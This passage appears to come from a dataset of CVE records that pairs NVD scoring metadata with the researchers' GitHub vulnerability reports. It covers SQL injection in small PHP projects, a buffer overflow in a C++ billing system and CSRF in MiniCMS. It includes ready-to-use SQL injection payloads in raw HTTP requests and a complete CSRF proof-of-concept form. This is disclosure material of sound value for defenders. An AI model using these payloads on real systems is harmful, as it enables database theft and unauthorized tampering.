" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /edit1.php HTTP/1.1 Host: 192.168.1.116:129 Content-Length: 7 Cache-Control: max-age=0 Origin: http://192.168.1.116:129 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:129/edit.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip Connection: keep-alive sno=111 --- ## Vulnerability type: + time-based blind + error-based + boolean-based blind ## Vulnerability location: + 'sno ' parameter ## Payload: --- Parameter: sno (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: sno=(SELECT (CASE WHEN (5097=5097) THEN 111 ELSE (SELECT 5448 UNION SELECT 4985) END)) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: sno=111 OR (SELECT 5629 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(5629=5629,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sno=111 AND (SELECT 8612 FROM (SELECT(SLEEP(5)))lMAr) --- + ![1](https://github.com/user-attachments/assets/5cb8861b-414d-468b-b04b-55f527735329) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/c091da1c-226c-46d8-a23f-fb18267a4c7d) + ![3](https://github.com/user-attachments/assets/4a64815e-d1ee-4684-8096-e5bb4236ff0b) + ![4](https://github.com/user-attachments/assets/a28d5b94-e18b-499d-a4dc-1824eccad2e9) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Vehicle Management" in PHP 1.0 "edit1.php " SQL injection
https://api.github.com/repos/ppp-src/a/issues/19/comments
0
2024-09-21T04:32:56Z
2024-09-21T04:32:56Z
https://github.com/ppp-src/a/issues/19
2,539,966,191
19
6,292
CVE-2024-9088
2024-09-22T22:15:02.447
A vulnerability has been found in SourceCodester Telecom Billing Management System 1.0 and classified as critical. This vulnerability affects the function login. The manipulation of the argument uname leads to buffer overflow. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "ADJACENT", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/61" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278266" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278266" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411854" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://www.sourcecodester.com/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:razormist:telecom_billing_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C9BFF928-A473-475F-8BA1-939856BCA7C8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/CveSecLook/cve/issues/61
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# Telecom Billing Management System in C++ with Source Code v1.0 - Buffer Overflow Supplier:https://www.sourcecodester.com/sites/default/files/download/razormist/telecom-billing-management-system-in-c.zip In the main program file, there is a variable of type char called uname, which receives data using scanf, resulting in the ability to write uname data of any length and causing a buffer overflow. ![3](https://github.com/user-attachments/assets/02e1bc37-ec42-486e-96eb-8b98ab1c3a57) Vulnerability location: Line 415, exists in the login() function. ![4](https://github.com/user-attachments/assets/9eca1eaf-05d9-41ce-bb35-f52d96506a89) To execute the login() function, you must press the Enter key while the program is running before you can reach the function. ![5](https://github.com/user-attachments/assets/ad9051fe-379d-4f23-b314-d0f26cb45a67) ![6](https://github.com/user-attachments/assets/1da27c50-ce36-4fc0-80e6-d83c3fb98e66) Note: I compiled using Visual Studio 2022 and turned off GS - and sdl- Set a breakpoint at line 415 and launch the Visual Studio 2022 debugger. When entering the login() function, input data larger than 10 bytes, and you will see the buffer overflow in the memory watch window. ![2](https://github.com/user-attachments/assets/ea0ab14f-664b-4075-97f3-f435e806a281)
Telecom Billing Management System in C++ with Source Code v1.0 - Buffer Overflow
https://api.github.com/repos/CveSecLook/cve/issues/61/comments
0
2024-09-21T04:58:47Z
2024-09-21T04:58:48Z
https://github.com/CveSecLook/cve/issues/61
2,539,974,591
61
6,293
CVE-2024-9091
2024-09-23T00:15:11.537
A vulnerability was found in code-projects Student Record System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument regno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/21" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "Vendor Advisory" ], "url": "https://vuldb.com/?ctiid.278269" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "Vendor Advisory" ], "url": "https://vuldb.com/?id.278269" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "Vendor Advisory" ], "url": "https://vuldb.com/?submit.411912" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:student_record_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E81D3A4D-EB3A-4716-B5AA-71424DC86572", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/21
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Student Record System" in PHP 1.0 "index.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Student Record System In PHP With Source Code ## Vendor Homepage + https://code-projects.org/student-record-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e7b42365-c27d-4fdb-b4e9-498917d5ba75 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php ' file of the 'Restaurant Reservation System' project. The reason for this issue is that attackers inject malicious code from the parameter "regno" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Student Record System", "xxx" discovered a critical SQL injection vulnerability in the "index.php " file. This vulnerability stems from insufficient user input validation of the "regno" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /index.php HTTP/1.1 Host: 192.168.1.116:131 Content-Length: 26 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Origin: http://192.168.1.116:131 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:131/index.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip Connection: keep-alive regno=1&password=1&submit= --- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'regno' parameter ## Payload: --- Parameter: regno (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: regno=1' AND (SELECT 9630 FROM (SELECT(SLEEP(5)))RPyb) AND 'cvvr'='cvvr&password=1&submit= --- + ![1](https://github.com/user-attachments/assets/39134cec-0bd2-41f8-9c11-f81f68a8a4f6) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/eb0ede00-6262-4c7d-90ce-a86943f09566) + ![3](https://github.com/user-attachments/assets/174c3d52-cf5a-4803-bf49-6a3b71a9bbc2) + ![4](https://github.com/user-attachments/assets/a987d952-08c6-4943-b4b0-ec60717d0907) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Student Record System" in PHP 1.0 "index.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/21/comments
0
2024-09-21T11:46:42Z
2024-09-21T11:46:42Z
https://github.com/ppp-src/a/issues/21
2,540,205,258
21
6,294
CVE-2024-9281
2024-09-27T13:15:18.153
A vulnerability was found in bg5sbk MiniCMS up to 1.11 and classified as problematic. This issue affects some unknown processing of the file post-edit.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions confusing version and file name information. The vendor was contacted early about this disclosure but did not respond in any way.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/51" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278663" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278663" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.411164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bg5sbk:minicms:*:*:*:*:*:*:*:*", "matchCriteriaId": "0DD09C60-55E3-42A0-8B9C-EA9C208D4F8A", "versionEndExcluding": "1.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/bg5sbk/MiniCMS/issues/51
[ "Exploit", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
# Vendor of Product https://github.com/bg5sbk/MiniCMS # Vulnerability Type CSRF # Vulnerable File post-edit.php # Affected Product Code Base <v1.11 # POC ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://www.minicms.com/mc-admin/post-edit.php" method="POST"> <input type="hidden" name="&#95;IS&#95;POST&#95;BACK&#95;" value="" /> <input type="hidden" name="title" value="THISpoc" /> <input type="hidden" name="content" value="thispoc" /> <input type="hidden" name="tags" value="" /> <input type="hidden" name="year" value="" /> <input type="hidden" name="month" value="" /> <input type="hidden" name="day" value="" /> <input type="hidden" name="hourse" value="" /> <input type="hidden" name="minute" value="" /> <input type="hidden" name="second" value="" /> <input type="hidden" name="can&#95;comment" value="1" /> <input type="hidden" name="state" value="publish" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="save" value="ä&#191;&#157;å&#173;&#152;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` # Vulnerability reproduction - After the installation is complete, log in as administrator. - Save poc as HTML file ![image](https://github.com/user-attachments/assets/88b3a9ad-02f3-41be-a23e-ca35435f5767) - Accessing this HTML file in a browser ,click "Submit request" ![image](https://github.com/user-attachments/assets/d504901e-cd98-4dbf-b102-61436a5a3040) - Successful exploitation of vulnerabilities ![image](https://github.com/user-attachments/assets/62dc04d6-96bc-4209-b987-648498ef4d5d)
There is another CSRF vulnerabilities in post-edit.php that can lead to add article
https://api.github.com/repos/bg5sbk/MiniCMS/issues/51/comments
1
2024-09-19T07:51:49Z
2024-10-08T14:28:26Z
https://github.com/bg5sbk/MiniCMS/issues/51
2,535,570,662
51
6,295
CVE-2024-9282
2024-09-27T13:15:18.443
A vulnerability was found in bg5sbk MiniCMS 1.11. It has been classified as problematic. Affected is an unknown function of the file page-edit.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions confusing version and file name information. The vendor was contacted early about this disclosure but did not respond in any way.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/52" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278664" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278664" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.411165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bg5sbk:minicms:*:*:*:*:*:*:*:*", "matchCriteriaId": "0DD09C60-55E3-42A0-8B9C-EA9C208D4F8A", "versionEndExcluding": "1.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/bg5sbk/MiniCMS/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
